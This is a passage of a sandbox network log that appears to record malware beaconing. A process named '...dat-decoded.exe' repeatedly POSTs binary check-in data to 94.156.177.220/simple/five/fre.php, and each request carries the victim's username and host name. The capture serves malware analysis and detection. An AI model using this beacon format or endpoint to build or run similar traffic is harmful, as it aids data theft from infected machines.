Oct 25, 2024 10:20:51.601859093 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49775	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:52.023469925 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:52.029076099 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:53.016560078 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49776	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:53.162477970 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:53.168380022 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:54.132812977 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49777	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:54.299670935 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:54.305428028 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:55.278779030 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:55.465573072 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:55.471024036 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:56.431684971 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:56.588748932 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:56.594180107 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:57.586129904 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49782	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:58.009188890 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:58.015959024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:20:59.001586914 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49793	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:20:59.149625063 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:20:59.156243086 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:00.129925013 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:20:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49799	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:00.305784941 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:00.311297894 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:01.269588947 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49805	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:01.413528919 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:01.419074059 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:02.412559032 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49811	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:02.570369959 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:02.575992107 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:03.546508074 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49822	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:04.294879913 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:04.300436974 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:05.289841890 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49828	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:05.445229053 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:05.450685024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:06.441284895 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49836	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:06.697072029 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:06.702578068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:07.670655966 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49842	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:07.818147898 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:07.823534012 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:08.796101093 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49851	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:08.964874029 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:08.970566034 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:09.927454948 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49858	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:10.205096960 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:10.210496902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:11.186306000 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49864	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:11.341701031 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:11.347065926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:12.310941935 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49871	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:12.687748909 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:12.693350077 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:13.646570921 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49877	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:13.806746006 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:13.812455893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:14.786429882 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49883	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:14.951975107 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
